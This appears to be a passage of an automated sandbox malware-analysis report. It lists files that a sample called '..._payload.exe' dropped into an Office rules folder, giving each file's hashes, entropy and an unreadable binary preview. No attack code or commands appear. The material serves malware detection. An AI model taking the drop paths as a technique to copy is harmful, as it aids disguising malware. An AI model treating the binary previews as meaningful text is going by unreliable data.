                                                                                                                          Preview:<?xml..?.. .A.#.....H.dN.. .Z..Aw?........B....a...J....wZ-..b..TX3...@........r?.)m.P..v......s....2..-}<kZ..0.A...b._.@b.....g......b.$.I..N.j.L.^......BQ@G#.}.~.3..E.n........3.^.|(.....Q,..(...N.Em..M..F....qe..\......eJ&.d......a...."J....B>..........a...PN.&..*Y2"........#........I.....A.6...z...o7n[..mT..:..I.D.KKc.Q.....E..W.^.3..:.T.....@"...#....].6.3G..~..vp..}A....wsW1.q?..D.A.rZJ.#...I6.%..V.....!...4b..#V.].$rc4.s...u...L.J7......$...@.8N.L.&gm..b...a....s._1.;.=.O..8..7..).i..d.M1{#...A9x.\..C.N.?......../).>..*.s-!.:...4!.M.B.$..:......\......!....rX)P.l.r.7z....p.>*....9.......vD.V........4....T.N..^....R.x...|z..=.`:.J.Y..o..2.S..`:....xC.g.4#....}.y.....lc.~...z|.GP..^.........z..B1...g..G?:..d.-h#.z.Oxj.....F.:..E&..r'-.,}m...z^7.1.D...M.`J;......E.l.....Dn..X..$.M..;u..~.......@..8{..&9.{...99;]..B.S..A.`...>B...+.`.B5..w.....l.+Fl..1...t.t.D.1..f..&...a........N..*......K..........}GBg.v......... .Z.mSyk~..c_}.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10803v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4639
                                                                                                                          Entropy (8bit):7.956459086958183
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:mNOtvO9TdtcGCRZdt7etdd38ahLc8u7X/Jgwlv6J2TlT:mNiO9TdtcrZdt7eFJc8u7BgLKT
                                                                                                                          MD5:7D3625AD3617116CC3E7972F43FF02D0
                                                                                                                          SHA1:0F3070388406CBC200A7BD9E10F4FC9EDB623520
                                                                                                                          SHA-256:9821E672B4861658A4959EA818114523E6F6C59AE7ABE289B356AFE4F56E7299
                                                                                                                          SHA-512:0B27DBA3287C30349850917A1109366FE78533D912FE92E51128BAC712EC541E1344F1F21C945F3CA55784E87AF80645DB3D76727E73D33E71D4BA62F559C03F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml~]\.c....vK....A.S.k@2./n.FCA.H.N..l.....A....].eA.jubl.b..V~1..Ay..;..A;....O.R/.....}....0.xG3..o<(.|...gU.#.Er.j;;1..r.._.L...}.P...|.t3B....B..}g....9z......q...eZ......|......z.U.6J7.Y.........L.|.....A..e[...W..f.....d+..^.o...(U..@y+BPypmb..PF.@5..e.w..=....)...=R.;..jj.8.e.....V..0;.\..T.H.....d.....r?M..'.."..8.../aG.S.#...Z..pE.yA.\...>]..]...K...H&.A.\...j..W..H...f|z6.}V.I....4.i\....p\3.q...Fv;Zc..;._!Q.t9..g..ke...1.P.o.J{Hw,aK.B0..GY`...._.I.Dai..F...x.~ C.^w.B$..K...3.[`..vkL.5z...U2m.Z..!.].k.......1..d.@h.//.P<0....p..1zz..d,..:.De..;.....V.,"`"&.?/...\...0........H.e..mBe...8.,f.v.$~..1xE&=g@~.2.%.....xOkPN......).3;.`6...........v ....u.Q..v..=.2............d..."....S.....B1...R...k.t3...8.9..@`aqkY..(..K..H..QU.2.`.#....kN.WP>5.1*m..}..N.Y...v....l.-....6......yGj.w.{Q...t..c.. 2..9.6.n....-......Z47&.|.E.........Y...".~.]..I......Uo.F_k...zN.I-.yV.W..f..T..c8^..X~....$v...vp...."Z'...O.....0|^....E'.4.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10807v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1329
                                                                                                                          Entropy (8bit):7.843318213915913
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:geakP6erMc3IcEluSENYpwrGt1tZ0FAQ6IW0CgXfhAICybD:lP/rMJ1LSVGt1rAAQ6w/XfhAICgD
                                                                                                                          MD5:C608CB5060747D344AABBDBE7FE1F2E1
                                                                                                                          SHA1:C5FEFA69728033A164AE90DC17C65A5B2BF4B39C
                                                                                                                          SHA-256:E48FDB2DA388ED3BA19C6B73D38D6C11ED82A6FCA171B363B4148666EF627E1D
                                                                                                                          SHA-512:8ADD035E273B659E55CA1F6B69F77E86FB51FF0BA926E80A4630E254DF1AB4383FFDB37BB91C77BA755BF9543D5E3B235E03D8FAFD0ACDD6C574596D428CCA2F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..T.q..<...k....oQ.^].(...X.Bhq........+.....C.^...Q......6.....q.{.J..1..Y....Zx1W.....-1w..v......X\*x0.....E`...-.....:4.P...S...Y>....+]..e">.v..p.8..QJ.1V....~k=x.a.O*..=..hg>O....7E.Rf.H.&.P.....|(.+`L..k.0.......b...mps.`..X..5.....qKJ.s..=d...h.P.>..i#p;....B......,.e...Z...B..H.W...T.n#8..F....,F..zw.r.s_NV.....o..Bq.'V...!..W..u.&ja..c...N.CI..slq..2.5..Y....0mW./j|..R..g....;.^I...[.C.~......P.@.sZ&..B.R..f18ig.6..............d.Zk\S..,.:[.......%...s..}.!..pq.Y.E...Z.z$8.........]`...J.2.N.&j...1<.:.i.te...1..zA:.c.r.a.o............m...a.o.4h.$.....h.Q}E..$.1n.....xf..]..4)...?......7#....+b.Z.....S......m...f..o.......U..fq.&,;.@/..7.f.F..z4........Ap..5.7{,f ..H......?pn.....^.A..Y..@.Zk.......o.....l...UP~.r..y...~q8.Q.4\'.x...a7>.h ..D..V6.14..,...$...v.....f...n...q}....y..].`.Od..69..$#...SC..4...*h.+{.......O..'+>m.C...a.AL.E.O..@.@N...j.E.....+C\..1?....[....'....>G}.g.V.@E...;w.1. ...T...1.d+.#d..OS..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10808v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1395
                                                                                                                          Entropy (8bit):7.861149147226791
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:YVYx6awk+fnowcU0NtKrkyio1IDE7yC5sfIJS2riqqWtI1QTmOAuu6FbD:oYxyows0Tio1Y1CSfIQ2p8CD
                                                                                                                          MD5:473411761500001100AD61E196DF2028
                                                                                                                          SHA1:974F13E206122874F78A2B2EA4FCE67472CB7D0C
                                                                                                                          SHA-256:23D3DD5DC4ADACA7F2B96817781537859F5894D8457463E35A877B8A9AA0269A
                                                                                                                          SHA-512:821F2424A140F6F7F0356290934FBC420D7C58082E6D268EBCDC63696BA78D29FC049855C312767E9644EA37F608D38C7F3CC92B75649BB7C743D8E0ECEC8ABB
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...5..}L..>E..jG.n.<....(...6..S.}2.G....q...t.....n"...6.%Sr...........Kf`4...].j..n...m...wFA.. ...n.u._{..rp..eN#W.;X....Y....E...0.B..D..9S$m..h......._....I....=....Dx.2..>A.Qz...9.\Q/+....P..?...L.U.....(..X..2.g'..O=....+.....;^../..A....P....MoIf...%.S...cC$k.&....N..........H......4.!.q.t..5;.../4.RW..B|.......px..Q..o..2B.../H8.....R.%..D...&.g_...d`...>IO\U...<[.!.r......u.....!..m....c.<..8.....$.#.A(..yk..(K.].....a...=n.X..W.).e.s...j..v,..VJ.z.w....]...e.x.U<.<..a.b.pl).!0n.y.. ....O...M..R..@..)..EK......Rk..D.<r./....#..(N.9..;g.`.....C9.u..oR.n]!g.S.,.......s...-...!#.F...$.....N...W.&.N.Ox;.I.^.....X>.q,..Z..3.gs..Nw@2...lK5...Vr.^.czf.iFDN..x...nK.b=..X...?0./..R...6....X.^._UA..xi..H=.Ho&.K......V.......J.........&RE.\U....&1,.........C3."..610.Z-ss.S\..<:.|.D8F...\.{.5.x.....]...=kJ-M&D..d...0.......w..'a@....1].:......bo.C...'Zo.K).hU&...g.1g...0..<...R....+.nmt.zV...4y.-_..b.&.6s*.X.v.VE..M...M.p...].O..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10818v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1124
                                                                                                                          Entropy (8bit):7.831891456909001
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:pM1CVQtDaaB25fB4ZEbIidyd3GtToTsWJALeJN2bD:S1CVQJH25fB4mbIiwVGhoTsWvWD
                                                                                                                          MD5:4879C120A99457943438ED13ADABA621
                                                                                                                          SHA1:B2582F1F60703EFC12C084DD7745C64D58A20284
                                                                                                                          SHA-256:B47D84B3C320252B14F331A7A072B6F2A3F67FB4B54D65270ED194D9EC0E6854
                                                                                                                          SHA-512:5B2868C4E0C16C202CE8670E02EC24613D7D06549A2A6FD5AFD6B06B94F4C72B3E58EFF3D6B537BC0F854766848274F91458434B6ED755A865EEA74BC124D298
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...*..P.._g.#..Q+>?$I.}....Wc;8./..?........\.~....>HV..XY.Q..W.78.a.wI`'...:..i4r.Jc9vh...:?..lGq....lq.qa`....$...x....;..?uK...1.S...c..(..T..2..d(....}Si.-]..T...i....U.]Q.5..U.....(.qk!Xb.n..3P.E.. ....8?v....F.l.@,A d4M^)~SG......<.c.i..s...o#.Sf...\+.B..o..eFe.$+.CmsnI.......fr....'s.\_....^#...C'...M.>bqt?.........{.y.).pl.t.....j....Ag.....9.J....O.f....X.Y.(d^.3.F....{.Kd....x...{o............(..7.<..n...iV...KQ}N.A.3..>..Y..U.Bg..V;.....G..W..<..af;5.G./[..%..iP"@..pY.s9Zk6...M...\....Y.y..2$.....j.:.l..1..l..:T...:?......f257.D....!S~.|..vuw....'...?T.V.x0...w.+S..W...W.!......)..7h.C9{."..vl\${.*y.8..g..8.=..Bc..A....E$..A....]=.Xo.I..&.o..F......#..._I.G .Y)<...0R4.M625!.5....O.dS.....]... ..0".....>D<%..N.N.'.9t.5...?I.u.K%!..M..ZZs.......*)....,d....M*P.g.u<.!F.PMZ........Mz....}z..r...4T2.^H6...#eJ.1...c.. 4x+fO..k.wB.;..U..../.....Ee..q.D....H.}X?Q.-.4...?..xV....L#...i.*2..).x..!..4M.....G...-......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10819v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8769
                                                                                                                          Entropy (8bit):7.978462662172072
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:b5FCZWZjc/VF9nbBubdJWYxQr4oUCCLjW+LTSl4dzdgow16xeLC:bfc9F9dk1xxoBsbdzwoSC
                                                                                                                          MD5:1C99A328F267533E41FB4BB5503BD5BA
                                                                                                                          SHA1:6CBFA21B120D988050BA684BB998A7D5EDAE18B8
                                                                                                                          SHA-256:59561D5998B11B1C2706F4128C2C9D814E3D2A013CB47806E0754237D22F978D
                                                                                                                          SHA-512:72DEE86BBF61DDA94C240323BB7AD380127225A345B4857D3C49C403FD47E40698CFBACD3721F8CE6567214BC8C90F3FAF7EAA26994E730660C058CF168490CC
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml"W.].".]z .8.2.F..R.wL...7P.'..>w..S...."..:..ce./.........@.K"\.z\+g..m...%.}.d.LU..&.&......y.i..2c.!..[...*..V.....8..,.4..|....U...4u...C.z...,w.PwS....'.......(......:h@.d."..$......;...0p.J.a.B..^..In..3........v.y.|..>|...._p....G^...(...}r...a0?g........o..a.6.....K(.O+.6.....[.I....:....>Z...AC....]_..x..nQ..4....].t./.E..{...=K..i.....`T......c......M...O].4wFB.;...)..^...2..~.r..2..lV..o..6n .........Dd.m..4...gqq...u......@6C..nv.....{.q.7....ZC..r[.1...V...5......".n..-.........>..M$..Ms..G|..o.3'..t..).qy.A7.....d)B.Hh2.M5@....as....3bN.L'1Ln...4}j.N..K..~x1...D<...|.+e.a.4....{.+~.`..a.R.A..W...YA..6..J...g..xxXp.-.A......a..&.._[....D..W.~..\.E..\D68N..z>t...<....Vn...Oz'..h.J.X3.....M .........GcOv...h.Xc...7 .|F.q.qZ.....'...~B.p.,.s.h....Q.......M.....NEK.........T'.....v..f...ib...{.".{..... ..G12%...Q......{.D..(~~...8.g...Y.......=-qh.f...6N.. .6'3Wr{.X$.+.fz..B..NO.&..O'.._f./.k..kf..)J..x........8..v........6kX

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10820v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5842
                                                                                                                          Entropy (8bit):7.969602127585681
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:qsurlxx38gPfJpJatKLIda1SRm7daOlXTQ1foYHci+DJAMnyvpGFJv6Bz7f5wDOZ:vIxlHJjat7dPXOljQ1Xj+DJvIKiB/hwm
                                                                                                                          MD5:E39A053410715D5BBA945324453604A6
                                                                                                                          SHA1:1F363465CA42F948BD7A7BCC1520519044311813
                                                                                                                          SHA-256:7B2E07CE1BDCE3E5CA344C44BA6EBCA89D1BD1AAA0F239188BED94AFC93E026D
                                                                                                                          SHA-512:359C499EE047899CB98506F9420C7FC55E4167A46917FAB86511FD70F6F0493EBEEC160202C31953A2DFA0A06FB1A21FF3A84857CD350D40535C53BB8AA95A26
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..r.._..uE.......c....h..,.nX.H~......s,.*..|2..].}<=|.g.Sq.p..=..T.'...>.<W.PK..r...&eH=3x~...x9......\$'....vb.-f...Y..c....;j.......{.o.....t....gU...V(.cV... .,.)\...d..i.Ida"m..xJ.....R.b....C...V.^.......*.o.&X.J..k..!-?...1..3...<..:.J....|.......k.......D...[.e...,.W...3.......e.....2.....#|.....N.....}..GY.<Q....P..wBK.....C.-....8..+)..z-....#2...wnlR.-q.u.*6)...t..n.(.....5..S,Ul...1G.}........\{...A..a}cp}{^1..L.r.R E[ja.0q...Zm.....w.:Q..A..+.F..]@]...?..;..C.4|..}.l.....Y.!...4....,\.lQ.;e.1.=e.n....B.6......d.R.z...?.>..........MB4......k./....$.M....'.W.L(.hS..>X!...A....j..&jv3......,. ..*.!.;.bi.F.@:......]$!.DD_..H*$S.M.~.&1G.[~+d..4R?....o.....6.FI.z=....%..4..3Ta.....4fY/F..}........O@.(.....sJ.....B.bN.5...L...K.|.'..`......'.....j..f...|!....{.-......4.{[8....-d.u..v....7..$..&.,.......R...8...o.P3m...\C,I.G.....6P...W...=...`.b..............r.1\.aJ.r....AFm..4?..S..H..a^...-Wne/.T./O...)k.'9..F.[!...^-.W$...}.\}B.5|..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10821v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4787
                                                                                                                          Entropy (8bit):7.958945129416457
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:ypl+QZ892V5ZMHtcRZdKP2JR1ljpY9UgHVVcaVwVrd6NpC635:sl+Qu2V5qtcRZoPKK9UKV3OoNw0
                                                                                                                          MD5:EC5F9B0209439B65C697E044A90A36E7
                                                                                                                          SHA1:11006ABB58F213323E16A2AAD7ED8BE8F1ED8894
                                                                                                                          SHA-256:495C6DD72FF3B3FA331159C5B4F7A383DBA1F2A6668411A339630477AADDFCA1
                                                                                                                          SHA-512:C898164217B01040147426A1FEF8352E1033B6F7CB29F0A882C9C3B852BD84D2E969D76B291B95776F3402DFAD4351A5DB57B01AA4C71EF0B7658CFFF2E130F9
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlv.~.[...m{?.6~i..:&.v....o.M.........3..;<.....U..<1....Vl...\.:..`..>.t.)....9:X.........X.2./.SK.ms...."+.LGt.V&.`...K.....s...k1j..y.z;.l.9.......U.....$.4./..V.n.R.QRF0:!..u.4..sb.m..}.<\...?..w...:.!y $2..q.z.....Xp....../S..a.`W.Bi./.......0jL.h!L..y....7....M.$.k..H...j...C.E....d...5g.F.4.Rhk.z...F...k.N.=...K...D........\...t..q.[.)...R.0..t.(i.dJ..9..`....B.f*..3.....b..V...+.HfoP....^..+..j..s.e.Hr....^./..[a.\Ra.G..P.....z.^9[.]...s....{.r<u....k.....e....&.\......1...=.7T...c9S{....V|..e.I.;...@.K6.y..j9.+..F....qB6Ky_..../....X$.q.....>.).e...\.......'......u.IG)Rm..:.....5.o..x[.|.C.a..j.vq....Tw..e<.e......\vy..3..P.F.no..q.W]..[..S.\|Z...R/........sP6..C.J.=Iu5.EOALt_.%..&.p.............8|q7..BE..W.U/.P..;.F......K........w.K@T...:.#..8...sB. 8...f!.~...8.y.h.....G...Jk...Q.]....Xm.....n{....[t.......`..=e~....S..j.C....&I4*O.F....D"..87r.=.. ....M.P....../M.4...k-..R....{...o..4.t.(.rd;K.r.m...4 ..W.Z..A..3xm..<.1.$V.5..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10822v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4786
                                                                                                                          Entropy (8bit):7.9557527542647914
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:P0a9GbmVLMOlBdfl75K4F6cWBVtivXkfCCMirfwdbgMF:c2fLMOlXllK4TWBGCCCMku
                                                                                                                          MD5:65398FEDBAAC2949BF49544407827137
                                                                                                                          SHA1:7691DA09A48AD3DC23341DEE5BB5620B69D480CB
                                                                                                                          SHA-256:426C3848FD85F77E8DCB591E0C8E2AEB9EF04D658536FE7F80B178A169025088
                                                                                                                          SHA-512:DAAF0B069D14FB94BBB579F00A11E0E3CD0B55F704F5AE5436B06D920CDC8D521DD6063E3E8A6B5158EB149248B634552FED6F54E3B2F4201745E4CD29CAD722
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.l..,.T......b1=.z.r..!}.....k@..c...CQm..oy#...c.QW&K.l@....Y..|&.?6....-Z...iW....K.*F..o...d4...{......h..VCQ..U...\.>0H..P=./..6[Wk....#...P&.V.X`..Q..t-c=.[4.....\wY...'..^@........?w.8..K.mK...../M.oul.foj\}.>Yx....5...1....l..~...Z.6.p5...]y..A..{<..~.d..r..y...._.;"...:j.wZr..Q.G.co..8.>Z+..U[i .:...>......|4.?5..g......^.jq.-c[.+...N>.8.8..%.B....]...zr...v,s..P..jH.B.\..{5..7.d.?.Smj.9l.>.P.V.Y....D.4.c...P......y3...:.....@M.=U...o'.M...+h.........y..f..n...:.../9...3.(w.~\..^.0..(..#d.Q.o...i...&.%.80.R....U..f........g.i$ve.....CY...C..f.%.w..m..*......E....c..{H.E.7.-g....T.p..Fg3.O.l.C....;l5.....].=.b.V .2.4..6.#%.c>...E..\w.x[Z...,+<r...y........S.B9.(......0..X{....I.3.a.^$...1f.C`.......{.....%..{......n.J...c....\....E.0....8.4..t>}...O.....LWN..H{...G..#...a...GDG5..........Ws....|.8.IC....k..$O.i.[t.B.j........h.+l......4....;.b.xrG.2..._.9.=.....U.#.`6.ro.]>.....a..o&+.Xy1.G.h..a7..76.t=B....R@......p%...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10829v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3030
                                                                                                                          Entropy (8bit):7.933820470293139
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:gbhJB8nkWk3Tbru66Ksxc2427mG4wwED9E8unBkXEbl3mm6+hdxuPD:KjB8PCTngK0c24cPqnBkXw8m6sxub
                                                                                                                          MD5:D14023A77381181616954F9EAA847EFD
                                                                                                                          SHA1:8A097E9C6181ADEE5DAAAA45BD931D7A68F57F9A
                                                                                                                          SHA-256:5701C150A8134F6E92A61CD976E49540701274906A0140458F895E26DFDF21B9
                                                                                                                          SHA-512:B4C0AD8045406BC269897756F79EC8C34DF8B5A8862171407F733F0FF009A612A9A34D5CFD731A9BCCE1C1E4AE040DF5FC5983252E079D233D026D461FE68BBB
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.t..l.j...u.])~];..+vQ.:h.>~x....->.E7..1.\.....|j..;4!.....@U.....x/.B8.'..t).y...p|P!..O..K......... .UV..<}rV......ri..gn.(.;....=.8=D...Q...m..ris...f.........?.jR...b.z.b0.6O.. {b...u.xA1........'.B.m&.ZK4bc...f.|..f..#.#....:.v...%...d.@NVe(D.....A....Z1'.O9|...^d.rL.yw...nfW.:eQ....R...-...8..'f.u.s8.\Q...d.5........TT.b.JG...S..D)v.o.......U.[..$....?..X....M7n.l5...2B.2......H|{1><.T.=..S)B.{.qE...YU.P.....$..o.g....D[.|.8.7Z.%K.<....y...p).F.c ........1k...h.6....._..4A.c>.D..%{.....G.~!q....T'...+..D....nPh2...jHC.4~-.i........^....Q...dtG.a_...w...p(.`{.?.tv..1y.n....P.c...)..Z..%......K.V.[..(X.)....D.....[.8.8.c..".t.g..R.k.f...|....B.*]<^.@..x.v../aTG..O{.)...pU.L.l....%.e.J.W#.R...^)...A..:*.Fz....rt,}0..P.NEd$....Z..'._8...x.._...h.!._.......,s......=gn`.V....7....{=G....j.......D..<PR*."....)../.......}....<.4.m^........}..M.e.S..Mb\...+J.I..,UWKb?..i..)va,.s...g}j...W.....o..Qk.1I..i..JJ.|..B/....9.Vh.{.{..?..b-../i....^F/9.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10879v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):789
                                                                                                                          Entropy (8bit):7.707421350825369
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:KKHnnk6NVAL5SdfXwQ5LwCchmIg97VNDO1gSeDGTPZ63TZNMbD:KKHk6gLgdF9chm/OgSDTw3TCD
                                                                                                                          MD5:A0529664FDCC051C53A3AE308CFB2574
                                                                                                                          SHA1:B9DD4EFC360293A49444CCEC473090E20E439C58
                                                                                                                          SHA-256:ED391009FC48F451B0E6E0F5402199AB13B4AA7C69910CAAD04DA63D4093E654
                                                                                                                          SHA-512:DE90F025DDB28EC7B8B91A87B084F9A9B5A5B187E3CCF51D6B9786ABF0EE1ABE6BC91BD1F63D18D1577829E9C11E613A0F553EA87EF2123EA9A7C2C9271CF152
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...... ...an..).k.......X..{.ZP.....d......"..........f.&J...-O./;..r.(=.......)....#..p.+....X.3RHW.F...8.. ..dP.9.t....b......B...KIP....g..xXT.....D......+F.=...+.%.k....M...z....d....6G..DU4.a$....U..cj.C..e.L....8..A`w..0A_ u.f......[2=pNj.uW..4.+.....C..Wn...7+.g..k..jmx`@$.......C.za.U.f.....omu#..5o.>me...r..{.n....4.B.S......m.^.U. .s.....c.....s.....,.;.....H......#..d...m...$.m..h..T....|.p....?3.A.3H..#..T.*.P'6v...P.6.%....w.nH.3..|N?m%...u..U.([.....<.C..:......e.-.R..E.N..l..d.......Y.:.'.7..# .....j..z.b....(....u.C.H...yT..p.U.....(...........h.).}...L..G.....bMa~.b.moq.'....`.7..1.....p...@7...'J._....(...J...Y...$..3J^.!%..{..K..n....;.D...!phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10880v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3017
                                                                                                                          Entropy (8bit):7.930289982218351
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:+7RT5XtSKkBPJ0rvZ1REoTGgW058NV0pwheayWnUrOIQ/rrMskiNQNe6eID:ERlXAdVJ0F1+oTGgkVtUMksfhDU
                                                                                                                          MD5:B87FE09BE88B00FFD5F627714863126A
                                                                                                                          SHA1:61A385FB25275A8CF7C8C639C8D6F199DB7BE512
                                                                                                                          SHA-256:F4092E947FC9285C0E4220B3E9CCBBD44D5CD1B35904FF13055531BFA5E591DB
                                                                                                                          SHA-512:16E6CD737F697813602D9C25FDB75A3B5B68747CF1DD65B457658A42ACDA62A1155E1051614840A1AB9D68654A7B53E12C50C3EC06B6FCF741119C114387D865
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.O...q..P5T.;.T.q......fG.`+.....2Q......(ENW....C:,l.'9.........:Di.).6H..E.n#.L....{m.X..4+iM..0]d..$..DMf...R.+.v.^Zo..4k.c...11Tc.R%...8O.jf......Y.S..6.w[..F._...b0......^..B.^J.>.I..j.t..q.g.....z..'.....P.K..n....E.:x./.CK.....@...+\h.n...[/..[T,..`_..G@..........<....S...e&...s.x..?.@............E....g.R..`.~8n....[.X.._x.@.[..l..v...Oj.2..'4}..I....>.N.E...V..!...i..>...Q......^.L]h................a..\.?m.7.+........>.F`[.V..:....(..75.ygm.i..Mu..uM.d.p.qF...Pc.P....D4..51.7z@}...q.`N.uN.a.%.8Y.=..#..T...k2.'.{L%..=UOT.N".s.2............".p-_.?k2....T.;-"<...}.....z.z.[%....&.(..N......Y.).V.lY...0y.7.y9.{.L......h.d.....k.....~.l.4T3.2.)...C...5.^........0..p..>w...2...hG.<z.t.l.....7.s.......8..`xa.YT".@....c...f..T8.....`..J...B.......7O...:.X.9..u.0.....\a5=.\ .j..#..i.Y.>..s.1..Pnl..d...5...q.f:...j.....Bg...m.Z...R.f.`......j.x-...J.ea.b...\]...4....#~jJ(.o..9...).6^7..,..R[..K...S.mE."`.X.?e.\JYobq......K/....I....a.@.....^2

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10881v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):823
                                                                                                                          Entropy (8bit):7.766216880555744
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:0d7+9auqt39WrbNE80MdfZC5cgKqjaBkOOxM5/ivS2yaoU6P1uBKvTidtmAK1qNp:R9aW/6MpUWgxeBuhS/U6PqQTsfliI1bD
                                                                                                                          MD5:B5C80AFA215FA7FC3D064D76BC98FC99
                                                                                                                          SHA1:419F13AF327B99B50CABBEE15FD38CF1FF8B50F1
                                                                                                                          SHA-256:FC88865E75944579925F35641CAD4BA7C8273EE5FEB7F18A956786BB503CBE43
                                                                                                                          SHA-512:67B83C0EFA30560749DB820533E8E4A515AFB7BBCEF18341FC993E44512E9E6C712AFD2E2E49C53CCF2A54307EBD12DD08BEDE5A66BD980BE2CF72C4AFD45B8D
                                                                                                                          Malicious:false
